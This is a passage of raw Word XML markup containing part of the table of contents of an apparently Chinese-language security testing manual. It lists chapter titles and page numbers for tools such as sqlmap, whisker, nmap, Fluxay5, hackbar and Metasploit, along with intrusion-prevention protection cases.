                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows下的sqlmap的安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884715 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>118</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16" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sqlmap工具使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884716 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>121</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17" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>山石NIPS设备sql注入防护案例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884717 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>125</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18" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>逃逸工具whisker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884718 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</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19" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>逃逸工具whisker安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884719 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</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20" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>逃逸工具whisker使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884720 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</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21" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>逃逸工具whisker支持的逃逸模式</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884721 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>127</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22" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>山石NIPS设备sql注入防护案例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884722 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>130</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23" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NMAP测试工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</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24" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NMAP工具安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</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25" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nmap工具使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</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26" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>流光Fluxay5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>150</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27" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>简介</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>150</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28" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>功能使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>152</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29" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Firefox 插件-hackbar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>173</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30" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>173</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31" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>176</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD53C7" w:rsidRDefault="00FD53C7">
          <w:pPr>
            <w:pStyle w:val="32"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1050"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8540"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc499884732" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>177</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33" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>178</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34" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploit相关术语</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>179</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35" w:history="1">
